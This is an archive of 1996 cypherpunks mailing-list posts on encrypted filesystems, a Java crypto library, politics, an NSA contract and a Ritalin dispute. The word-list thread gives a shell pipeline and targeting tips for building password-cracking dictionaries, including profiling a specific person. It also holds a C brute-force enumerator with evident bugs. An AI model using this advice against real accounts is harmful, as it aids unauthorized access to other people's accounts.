but just in case.. 

If you have access to a shell, and to the news spool, you can generate
some quick lists by hopping into the directory of any newsgroup that
interests you and doing:

cat * | tr -cs A-Za-z '\n' | tr A-Z a-z | sort | uniq > my-big-ol-wordlist

With most unixes that will generate an alphabetized list of all the unique
words in your source text, converted to lowercase. I've had some problems
with tr on a few machines, however. Adding a '-c' after 'uniq' will tell
you how many times each word occured (useful for grepping out words that
appear too infrequently, or too frequently) .. 

Incidentally, if you're running crack against a particular person it might
be useful to check dejanews for posts by the individual, and generate your
wordlists from that, I havn't had occasion to actually try this but it
seems like a good idea. 

--nc








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfricker@vertexgroup.com (John F. Fricker)
Date: Tue, 9 Jul 1996 12:37:30 +0800
To: cypherpunks@toad.com
Subject: Re: What remains to be done.
Message-ID: <2.2.32.19960709010452.00c71718@vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:09 PM 7/8/96 +0000, you wrote:
>On  8 Jul 96 at 14:12, Ray Arachelian wrote:
>[..]
>> I'm constantly switching between NT and 95 and have them installed on the 
>> same drive.  Would be cool to have some low level driver to encryption 
>> from the Master Boot Record for example to get around unfriendly OS's- but 
>> then NT won't respect the BIOS calls, 95 in 32 bit mode won't, Linux sure 
>> as hell wont, etc.... that was the whole idea of having a BIOS in the 
>> first place, but woe is us.
>
>BIOS was written for real mode... part of the problem. Another is the 
>not-made-here syndrome, and in a sense Linux, OS/2, NT and 95 are 
>different types of operating systems, so a shared BIOS is unfeasible.
>
>It would be nice to develop an encrypted filesystem that could be 
>ported across operating systems for those of us with multiple OS's.
>
>BTW, Linux 2.0 is making a nice step in that direction by adding 
>support for mounting a file (which contains a filesystem), 
>specifically to allow encrypted file systems as well as things like 
>testing out iso9660-fs before buring CD-ROMs, etc.  In theory 
>something similar can be done with Win95/NT and OS/2, but it hasn't 
>been done the proper way (SecureDevice is really a hack in that 
>sense). 
>

One of these days Microsoft will officially release NT's IFS SDK. A few
"preliminary" and incomplete copies of a 1993 beta release do float around
but for a mere $50K there's a company that will sell you the complete source
for an IFS. It's a crime that Microsoft hasn't shipped this SDK yet as the
Installable File System is one of the great powers of NT.

So, if someone is interested in coughing up the $50K I know a couple NT
programmers just chomping at the bit to build cool IFS's like PGPDrive, etc.

--j





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Tue, 9 Jul 1996 04:44:10 +0800
To: enquirer@alpha.c2.org
Subject: Laughing my ass off
Message-ID: <199607081617.SAA25649@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Holy Exon that was good!!  Please publish a PGP pubkey so that 
I may send you a token of my appreciation.  (A token which is
exchangeable for a national currency, perhaps.)


Bryce

- -----BEGIN PGP SIGNED MESSAGE-----

Certificate-Type: Chudov/Wilcox Content/Author Rating
Rating-Type: Content
Object-ID: Date: Sun, 7 Jul 1996 23:32:37 -0700/From: enquirer@alpha.c2.org
Topicality: 10
Entertainment: 10
Value: 8
Signer: 0x2c2998ad
Signature: <wrapped>

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMeE0U0jbHy8sKZitAQF6QwMAqj1CTsV7VzSLBxbwL8vZKG93a1nG8nrn
p6WQB7BXQ/0shyjKpaKhfQKiiYVAAcINvfS2Df8ZcAYaEbIzoh3R6jMFvEye3ocp
qI1ipX08vdUp8H01CqtDugjfmGt1ZcM6
=Wnyy
- -----END PGP SIGNATURE-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMeE0kUjbHy8sKZitAQEKIAL+IGV5vlaKU9PL6fGdr2dCGUsDoLNnl+un
oWowEa4+Wtw3lAoPN68kEaXd+UPedS+oaxuTNwvFz7SHmS25+BvhTOylYVhs+ASx
L0+Cv/BCDqCx22r2EfGm9JSncidwmF9G
=mP3K
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 9 Jul 1996 11:13:35 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children [RitalinPunks]
In-Reply-To: <199607082103.OAA07069@jobe.shell.portal.com>
Message-ID: <199607082237.SAA10948@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



anonymous-remailer@shell.portal.com writes:
> Something like 10% of ALL public school students in Tennessee are on
> Ritalin.

I don't know whether this figure is true, but regardless...

> Presumably, the percentages are similar in other states.  I have
> trouble believing there are so many kids suddenly suffering from a
> disorder that wasn't even discovered until a few years ago.

Actually, it and the treatment have been around for a very long time.

You are probably right that there are many cases in which the drugs
are given incorrectly because it is often easier to medicate than to
deal with problems by other means. However, that does not mean that it
is always a bad idea to medicate.

As for the long rant from the drug addict that took up the balance of
your posting, Ritalin isn't prescribed for ADD in quantities that get
someone "high", nor are its effects the same on such people.

> This has gotten extremely long, and I wasn't planning on it.
> But this ritalin thing is so insidious and is so OBVIOUSLY
> meant to do harm that I have to write this long thing about
> it. The whole attention-deficit disorder is a fabrication
> that traitors use to pump kids full of controlled substances.

The person writing this doesn't sound exactly rational.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 9 Jul 1996 11:21:40 +0800
To: AwakenToMe@aol.com
Subject: Re: Word lists for passphrases
In-Reply-To: <960708182934_352578480@emout18.mail.aol.com>
Message-ID: <199607082320.TAA10998@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



AwakenToMe@aol.com, in a profound display of stubbornness, continues
to insist that his program to enumerate all possible words of length N
(that is, aaaaa, aaaab, aaaac, etc.) is somehow interesting. I am
therefore forced to drive in the nail with a sledgehammer. Forgive me.

He writes:
> > > > It's [...] trivial enough to be done by 99% of the people on
> > > > cypherpunks in their sleep.
> > >  
> > > Yes. But let me ask you this. Have you done it yet??
> >
> > Most of us don't bother writing up four line programs and shipping
> > them out, no.
>  
> really? Wow. four lines of code? You must be a really good programmer. duh.

Hardly. A ten year old could do it. I know, since I wrote substantially more
sophisticated stuff when I was ten.

Since you insist, here is less than a minute's work. Yes, I timed it.

------Cut Here------
/*
   This could be more elegant, but the point is obviousness.
*/
#include <stdio.h>

int main()
{
	char i[6];

	for (i[0] = 'a'; i[0] < 'z'; i[0]++)
	  for (i[1] = 'a'; i[1] < 'z'; i[1]++)
	    for (i[2] = 'a'; i[2] < 'z'; i[2]++)
	      for (i[3] = 'a'; i[3] < 'z'; i[3]++)
		for (i[4] = 'a'; i[4] < 'z'; i[4]++)
		  printf("%s\n", i);
}
------Cut Here------

The operative portion of the program is six lines ling, and five of
those lines are virtually identical.

You can write the thing much more elegantly, without redundant
code. However, I have elected to leave it as utterly brainless as
possible to demonstrate that ANYONE could write the thing.

> Youd be surprised at the # of requests from people who actually had a good
> use for it, and didnt have the time to spend writing it themselves.

Human stupidity is never a surprise.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Tue, 9 Jul 1996 14:21:04 +0800
To: cypherpunks@toad.com
Subject: HotWired -- "Third Choice" for Netizens may be Libertarian Party
Message-ID: <Pine.3.89.9607081915.A23370-0100000@well>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Mon, 8 Jul 1996 19:46:34 -0700 (PDT)
From: Declan McCullagh <declan@well.com>
To: fight-censorship+@andrew.cmu.edu
Subject: HotWired -- "Third Choice" for Netizens may be Libertarian Party

HotWired: The Netizen
http://www.hotwired.com/netizen/

"Third Choice" -- Campaign Dispatch

by Declan McCullagh (declan@well.com)
Washington, DC, 8 July 
   
   The nervous sweat of US voters forced to choose between
   character-impaired Clinton and vision-impaired Dole may distill into
   fuel for the Libertarian Party. At the party's ragtag convention last
   week, Harry Browne began to make a case that the Libertarian Party
   isn't just for cyberheads and conspiracy theorists.

[...]
   
   It was a refreshing departure from the highly scripted 1992 Democratic
   National Convention - more an exercise in infotainment than anything
   else - where party insiders worked quietly to block a loudmouth Jerry
   Brown from speaking unless he signed an agreement pledging fealty to
   Bill Clinton...
      
   Not so with the Libertarian convention, which netizens attended in
   force. Phil Zimmermann, author of Pretty Good Privacy, appeared at a
   privacy workshop on Saturday where delegates received PGP on floppies.

   On Thursday, Jim Ray, a cypherpunk and Libertarian delegate from Coral
   Gables, Florida, introduced a motion to strengthen the party's stance
   on encryption by condemning "government access to keys" - a mandatory
   backdoor for the Feds. "Or GAK, as we call it on Cypherpunks," Ray
   told the other delegates, who passed the revised crypto plank
   unanimously.

[...]

   The so-called Year of the Net marches on, but the Libertarian Party
   now stands as the only serious political party with a commitment to
   defending the rights of netizens.

###






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfricker@vertexgroup.com (John F. Fricker)
Date: Tue, 9 Jul 1996 14:31:44 +0800
To: Rick Smith <smith@sctc.com>
Subject: Re: [RANT] Giving Mind Control Drugs to Children
Message-ID: <2.2.32.19960709030143.00c14778@vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:32 PM 7/8/96 -0500, you wrote:
>Tim writes about Ritalin:
>
>>I've been over visiting my friend to see some of this. The Ritalin-sodden
>>kid arrives like a zombie. When the Ritalin wears off, he's rambunctuous,

>Alex, our 8 year old son, uses Ritalin. He doesn't need Ritalin to
>concentrate. He can get caught up in a building project for hours and
>create a masterpiece. He can focus so thoroughly you can't pry him
>loose.
>
>What Alex *can't* do is get comfortably through a day of grammar
>school. I sympathise -- I was the same way when I was that age. I had


Errrrr.

Ever hear of home schooling?

Seems like if your child needs drugs to go to school than perhaps school is
the problem not that your child's body lacks Ritalin.

Sheesh.

So it happens that I was talking with a fellow Saturday who grew up on
Ritalin. He's 36 now and strung out. Life with Ritalin prepared him for
drugs, you know. They were natural. Like the body is made for different
laboratory made molecules with dubious effects. He never got into the hard
stuff (like the opiates) like the anti-drug people promised though. Also
turns out that he now has a neurological disorder that is untreatable and
uncurable. So now he's goes through his days in constant pain courtesy of
the best childhood his wealthy Pacific Palisades Parents could buy. 

I wonder if there are any other Ritalin side affects that don't become
prominent until 30 years later?

But than someone who thinks milk is wholesome needs some lessons is
nutrition, anatomy and physiology.

--j





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Tue, 9 Jul 1996 12:07:06 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Technology- vs. Human-based Surveillance
Message-ID: <199607090024.UAA13729@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On  8 Jul 96 at 9:20, Timothy C. May wrote:
[..]
> A human-based surveillance state is very expensive, even by the standards
> of modern America and its bloated government. The recent example of the
> DDR's "Staasi" provides an example. Hard to hide the extent of the
> surveillance when so many people are involved.

Very true, but many totalitarian countries don't try to hide it.

Q: are surveillance tools (sophisticated analysys and search engines, 
miniature cameras and microphones and other electronics) under the 
same countrols as crypto? de facto controls or on paper only?  It 
would seem that 'emerging democracies' in the East Bloc can obtain 
sophisticated Western tech to strengthen and hide surveillance 
systems (perhaps in ways that even J.Edgard Hoover would have found 
repulsive, if that was possible).  I wonder if anyone has any stats 
about foreign countries or orgs purchasing such equipment.

Yet another arg for liberal crypto-export rules, perhaps.

Rob.
 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Tue, 9 Jul 1996 08:57:30 +0800
Subject: [Announcement] - Crypto library for Java available
Message-ID: <31E159E2.1CFBAE39@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


The Systemics Cryptix crypto library for Java is now available for
download at http://www.systemics.com/software/

The library is FREE FOR COMMERCIAL AND NON-COMMERCIAL USE.

Apart from much tidying up, there have been several signigicant additions
to the library, including a Blowfish implementation, RSA encryption
(including key generation routines), CFB and CBC block cipher mode modules,
and a cryptographically secure random InputStream.

Enjoy!

                CRYPTIX 1.1 - CRYPTOGRAPHIC EXTENSIONS FOR JAVA


     _________________________________________________________________

                                  DESCRIPTION

   This library contains a suite of cryptographic classes for Java. Some
   of the classes have been implemented in native code for performance
   reasons, and have been tested on Windows 95, Windows NT, Solaris,
   Linux and IRIX.

   The package documentation is available on line.

                                   FEATURES

   All of the following have been implemented:
     * java.crypt.BlockCipher
       This class is a base class for all block ciphers.
     * java.crypt.Blowfish (based on code from A.M. Kuchling, Bryan Olson
       and Bruce Schneier)
       An implementation of Bruce Schneier's Blowfish block cipher.
     * java.crypt.CipherFeedback
       A class for implementing the cipher feedback mode of block cipher
       encryption.
     * java.crypt.CSRandomStream
       A cryptographically secure pseudo random input-stream.
     * java.crypt.DES (based on code from Eric Young)
       An implementation of the DES block cipher.
     * java.crypt.HashMD5
       An class encapsulating MD5 hashes.
     * java.crypt.HashSHA
       An class encapsulating SHA hashes.
     * java.crypt.IDEA
       An implementation of the IDEA block cipher algorithm. Based on
       native libraries.
     * java.crypt.MD5 (based on code from RSA Data Security, Inc.)
       An implementation of the MD5 message digest algorithm. Based on
       native libraries.
     * java.crypt.MD5OutputStream
       An output stream the creates an MD5 hash of its input.
     * java.crypt.MessageDigest
       A base class for all messsage digest algorithms.
     * java.crypt.MessageDigestOutputStream
       A class for using message digest functions to hash an output
       stream.
     * java.crypt.MessageHash
       A base class for classes encapsulating hashes.
     * java.crypt.rsa.PublicKey
       An RSA public key.
     * java.crypt.rsa.RSAKeyGen
       A class for generating RSA public/secret key pairs.
     * java.crypt.rsa.SecretKey
       An RSA secret key.
     * java.crypt.SHA (based on code from NIST and Peter C. Gutmann)
       An implementation of NISTs SHA message digest algorithm. Based on
       native libraries.
     * java.crypt.SHAOutputStream
       An output stream the creates an SHA hash of its input.
     * java.crypt.StreamCipher
       A base class for stream ciphers.
     * java.math.BigInteger (based on code from Eric Young).
       This class implements arbitrary length integers and some
       associated mathematical functions. Based on native libraries.
     * java.math.MPI
       A class for converting BigIntegers to and from MPI format
       integers.
     * java.math.PRNG
       A class for generating a pseudo random sequence with a period of
       2**160.
     * java.math.RandomStream
       An input stream that is random.
     * java.math.TestPrime
       A class for testing the primality of BigIntegers.

                                   COPYRIGHT

   This library includes (or is derived from) software developed by (and
   owned by) the following:
     * Peter C. Gutmann
     * A.M. Kuchling
     * NIST
     * Bryan Olson
     * RSA Data Security, Inc.
     * Bruce Schneier
     * Eric Young &lteay@mincom.oz.au>


   Other parts of the library are covered by the following licence:

   Copyright (c) 1995, 1996 Systemics Ltd (http://www.systemics.com/) All
   rights reserved.

   This library and applications are FREE FOR COMMERCIAL AND
   NON-COMMERCIAL USE as long as the following conditions are adhered to.


   Copyright remains with Systemics Ltd, and as such any Copyright
   notices in the code are not to be removed. If this code is used in a
   product, Systemics should be given attribution as the author of the
   parts used. This can be in the form of a textual message at program
   startup or in documentation (online or textual) provided with the
   package.

   Redistribution and use in source and binary forms, with or without
   modification, are permitted provided that the following conditions are
   met:
    1. Redistributions of source code must retain the copyright notice,
       this list of conditions and the following disclaimer.
    2. Redistributions in binary form must reproduce the above copyright
       notice, this list of conditions and the following disclaimer in
       the documentation and/or other materials provided with the
       distribution.
    3. All advertising materials mentioning features or use of this
       software must display the following acknowledgement:

        This product includes software developed by Systemics Ltd
                (http://www.systemics.com/)


   THIS SOFTWARE IS PROVIDED BY SYSTEMICS LTD ``AS IS'' AND ANY EXPRESS
   OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
   WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
   DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE FOR
   ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
   DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
   GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
   INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER
   IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
   OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
   ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

   The licence and distribution terms for any publically available
   version or derivative of this code cannot be changed. i.e. this code
   cannot simply be copied and put under another distribution licence
   [including the GNU Public Licence.]


     _________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Elliot Lee <sopwith@redhat.com>
Date: Tue, 9 Jul 1996 13:02:35 +0800
To: Ray Arachelian <sunder@dorsai.dorsai.org>
Subject: Re: What remains to be done.
In-Reply-To: <Pine.SUN.3.91.960708140840.22851F-100000@dorsai>
Message-ID: <Pine.LNX.3.93.960708205907.28245G-100000@redhat.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 8 Jul 1996, Ray Arachelian wrote:

> I'm constantly switching between NT and 95 and have them installed on the 
> same drive.  Would be cool to have some low level driver to encryption 
> from the Master Boot Record for example to get around unfriendly OS's- but 
> then NT won't respect the BIOS calls, 95 in 32 bit mode won't, Linux sure 
> as hell wont, etc....

Linux, however, does have the cfs (crypted filesystem), which will let you
do the same thing. Supposedly lets you plug in your own encryption method
and all that... Also allows different users to encrypt with different
passwords, and such (or just the root user encrypt the whole partition).
Find the web page for more info.

\\\| Elliot Lee                |\\\    ||  "Claim to fame":
 \\\| Red Hat Software          |\\\   ||  Live in only town in the
  \\\| Webmaster www.redhat.com, |\\\  ||  USA with an unlisted ZIP
   \\\| Programmer, etc.          |\\\ ||  code.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Tue, 9 Jul 1996 15:04:00 +0800
To: cypherpunks@toad.com
Subject: Re: Word lists for passphrases
Message-ID: <960708210619_430002397@emout13.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


perry@piermont.com (perry e. metzger)
In a message dated 96-07-08 19:21:11 EDT, you write:

<< Human stupidity is never a surprise.
 
 Perry
  >>
I know. Just look at your posting a private message to a newsgroup because of
something thats just beyond your use. So... you can't handle it and become
like a baby.. and start something so utterly pointless as this.. by writing
me back to begin with. You dont like the program..or think its so trivial
(which it is... big fuc*in deal )
then thats fine. EVERYONE has their opinion. Some people find a use out of
it...obviously you dont. Its Ok man. Just take some prozac (or is the topic
ritalin now??)  and youll be A OK




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Tue, 9 Jul 1996 14:32:21 +0800
To: ncognito@gate.net (Ben Holiday)
Subject: Re: Word lists for passphrases
In-Reply-To: <Pine.A32.3.93.960708174618.18872A-100000@navajo.gate.net>
Message-ID: <199607090210.VAA07394@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Ben Holiday wrote:
> If you have access to a shell, and to the news spool, you can generate
> some quick lists by hopping into the directory of any newsgroup that
> interests you and doing:
> 
> cat * | tr -cs A-Za-z '\n' | tr A-Z a-z | sort | uniq > my-big-ol-wordlist
> 
> With most unixes that will generate an alphabetized list of all the unique
> words in your source text, converted to lowercase. I've had some problems
> with tr on a few machines, however. Adding a '-c' after 'uniq' will tell
> you how many times each word occured (useful for grepping out words that
> appear too infrequently, or too frequently) .. 

Actually I am fairly sure that your selection of words will be mediocre
at best. There are words (such as nethermost, insatiable, insufferable)
that are almost never used in news.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Tue, 9 Jul 1996 12:42:26 +0800
To: cypherpunks@toad.com
Subject: RE: wordlists and al that bologna
Message-ID: <960708211433_430007579@emout17.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain



In a message dated 96-07-08 19:27:44 EDT, perry@piermont.com (Perry E.
Metzger) writes:

<< Just so you understand this, most adults very quickly notice when they
 are in danger of looking foolish, and stop talking so as to prevent
 themselves from looking even worse. You have to be fairly stupid to
 keep ranting when you have nothing to back you up. I suggest learning
 this lesson now.
 
 If you are in fact an adult, my apologies to your parents -- tragic
 mental impairments strike even the best of homes.
 
 .pm
  >>
In danger of looking foolish? Man.. you said it all. Young child?? Hardly.
Nothing to back me up? Hardly a clue is what you have. 16 people so far asked
me for the program. Obviously they had a use for it. for SOMEEEE reason that
is beyond you to comprehend. If it doesnt work for you.. then it shoudlnt be
for ANYONE. Wow.. you sound like some of the politicians I get to see logs of
trying to regulate encryption..etc. I wonder if you are one of them!!
My..wouldnt that be a funny coincidence. 

In a message dated 96-07-08 19:27:44 EDT, perry@piermont.com (Perry E.
Metzger) writes:

<< If you are in fact an adult, my apologies to your parents -- tragic
 mental impairments strike even the best of homes.
 
 .pm
  >>
As they say in your case... Sad But True
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 9 Jul 1996 17:19:08 +0800
To: ncognito@gate.net (Ben Holiday)
Subject: Re: Word lists for passphrases
Message-ID: <2.2.32.19960709044304.00b09650@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:10 PM 7/8/96 -0500, Igor Chudov @ home wrote:
>Ben Holiday wrote:
>> If you have access to a shell, and to the news spool, you can generate
>> some quick lists by hopping into the directory of any newsgroup that
>> interests you and doing:
>> 
>> cat * | tr -cs A-Za-z '\n' | tr A-Z a-z | sort | uniq > my-big-ol-wordlist
>> 
>> With most unixes that will generate an alphabetized list of all the unique
>> words in your source text, converted to lowercase. I've had some problems
>> with tr on a few machines, however. Adding a '-c' after 'uniq' will tell
>> you how many times each word occured (useful for grepping out words that
>> appear too infrequently, or too frequently) .. 
>
>Actually I am fairly sure that your selection of words will be mediocre
>at best. There are words (such as nethermost, insatiable, insufferable)
>that are almost never used in news.

If the purpose is for use with "Crack" or some similar program, it might be
better than you would think.  You won't get the "unusual" words, but you
will also get the words in common usage that do not appear in dictionaries.
(Such as fnord, jedi, killfile, and the like...)  You will also get alot of
proper names, which may have been used as passwords.  The idea is that words
in common usage may be more likely to be used as passwords.

Another thing to look for when choosing dictionaries/wordlists for crack is
not sticking to english.  If you have a userbase that is known to have a
certain percentage of people of a non-english background, you will want to
find lists of words from that background.  (I had a sysadmin asking me about
Yiddish and Hebrew wordlists for just that reason.)  These can be a bit
harder.  (Especially for unusual languages.)  But knowing your userbase can
make all the difference in what it might take to crack the passwords from
the outside.
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 9 Jul 1996 13:25:58 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children [RitalinPunks]
Message-ID: <2.2.32.19960709014612.0085625c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:03 PM 7/8/96 -0700, anonymous-remailer@shell.portal.com wrote:
>Something like 10% of ALL public school students in Tennessee are on
>Ritalin.  Presumably, the percentages are similar in other states. 

Imagine how much worse slave schools would be if you *weren't* drugged.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Tue, 9 Jul 1996 16:37:41 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <199607090419.AAA11279@jekyll.piermont.com>
Message-ID: <199607090459.VAA24458@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@piermont.com> writes:

 > Why eliminate the people with endocrine problems? You need
 > not invent a new syndrome. The folks with severe deficits of
 > growth hormone are an actual group, and are a perfectly fine
 > group to give growth hormones to.

The point was that the group with endocrine problems was an
appropriate group to give growth hormone to, whereas the shortest
10% of the population was not.

Similarly while there might very well be some disorder of
cognition for which amphetamines would be appropriate medication,
prescribing them on the basis of which 10% of the population
performs least well in the traditional "cells and bells" school
environment is not it.

The fact that some claim to be able to demonstrate ADD by
"repeatable biological tests" carries no more weight than the
ability to repeatably demonstrate that a person is short of
stature by "repeatable tape measure tests."

 > However, that doesn't mean that growth hormone isn't needed
 > for the people whom you choose to dismiss in your first
 > paragraph as though they were not a valid place to draw the
 > analogy.

There is a difference between giving medication for a verifiable
organic problem, like insulin for diabetes, or growth hormone for
a pituitary defect, and giving it to the 10% shortest, or the 10%
most likely to call their teachers bleep words.

 > Has it occurred to you that many of the children in
 > question are happy being medicated, as are many adults? In
 > any case, who are you to tell other people what's good for
 > them?

Again, to return to the height analogy, doctors have to throw
short parents seeking human growth hormone for their perfectly
healthy short children off their doorsteps every day.

Same goes for patients seeking antibiotics inappropriate for
their illnesses, and countless other things.

The price of giving the patient (or the patient's parents)
everything they want is disease-resistant microorganisms, a
country where everyone is over six feet tall, and classrooms full
of obedient citizen-units in Soma-induced trances.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Zirko <lzirko@c2.org>
Date: Tue, 9 Jul 1996 16:35:25 +0800
To: cypherpunks@toad.com
Subject: Secure Computing extends deal with NSA for E-mail system
Message-ID: <199607090501.WAA08487@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Tue Jul 09 00:01:32 1996
Following is an article from PC Week that some might find of interest.  
Also available at this URL - http://www.pcweek.com/news/0708/08escc.html

        Secure Computing Corp. has signed a $15 million deal with the
        National Security Agency to develop the agency's secure
        network server system for Department of Defense employees'
        E-mail.

        Officials of the St. Paul, Minn., company announced that
        Secure Computing will take about a year to complete the
        project, which will ensure security within the Defense
        Department E-mail system.

        The agreement is an extension of a deal Secure Computing first
        signed with the National Security Agency in 1992, according to
        company officials.


Lou Zirko                                (502)383-2175
Zystems                                  lzirko@c2.org
"We're all bozos on this bus" - Nick Danger, Third Eye

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1

iQEVAwUBMeHntstPRTNbb5z9AQEAfggAmM16zuktn2KeIsr4WNIYP69LZ1lZ4veY
bqllaZfccr17NIvffqSINrxY62Xl5daVHnLcpy7y0QSMa3pksj3+FKT5X8C+GYQ6
tCOlTPO8VC0mXONXAmsZSvHEqQrHYHwJDZ9ljciXOyjajaPoElzTm3XScKLGR9p9
tac+3HIMuKmdXrVJ23Z8OmEvvKAiUqQdZtgS+FE+hwP2vzVh68Tqv+yUM5Ac6gAS
i3Z5YxJ+0Ycugqa0BLyoJi1aOe2PqC6EbEzPI0LG2WNPA25MRFSDMJxWr2pulEas
pBqZmzbAVSVI/JqaMU50LRKFIGb58gl+47QLFmCWqFWKlarDs6NcvA==
=LbOA
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfricker@vertexgroup.com (John F. Fricker)
Date: Tue, 9 Jul 1996 16:28:23 +0800
To: perry@piermont.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
Message-ID: <2.2.32.19960709050234.00c7e930@vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:34 AM 7/9/96 -0400, you wrote:
>
>John F. Fricker writes:
>> Seems like if your child needs drugs to go to school than perhaps school is
>> the problem not that your child's body lacks Ritalin.
>> 
>> Sheesh.
>> 
>> So it happens that I was talking with a fellow Saturday who grew up on
>> Ritalin. He's 36 now and strung out. Life with Ritalin prepared him for
>> drugs, you know. They were natural. Like the body is made for different
>> laboratory made molecules with dubious effects.
>
>Yeah, you know, I bet your body doesn't get infected for lack of
>penicillin, either. I suspect that taking Penicillin prepares you for
>drug dependancies. Why, next, you might take insulin to deal with
>diabetes, or worse!
>
>Thank god most of those heroin addicts never had Ritalin as kids -- you
>never know how much worse off they might be now. And if they'd gotten
>antibiotics, why, forget it.
>
>Quit from modern medicine cold turkey. Its the only way.
>
>Perry
>

Perry,

you're typically vitriolic wit fails you. What's up? Lost your prescription?
Snide pills spill in the toilet again?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Tue, 9 Jul 1996 14:48:05 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <Pine.LNX.3.93.960708142146.352A-100000@smoke.suba.com>
Message-ID: <Pine.LNX.3.94.960708214829.704A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

OK, so I lied.  However, I can fit some crypto relevance into this.

> On Mon, 8 Jul 1996, Arun Mehta wrote:
> > Ritalin is a lifesaver for a small % of children who suffer from a condition
>                                ^^^^^^^
>      Key word here.            |||||||
> 
> > Ritalin... mother was furious.  
> > 
> > Some of the kids who use foul language (a very small %) have Tourette's
                                            ^^^^^^^^^^^^^^
> > disease, and also need medicine (a different one)... by and large the

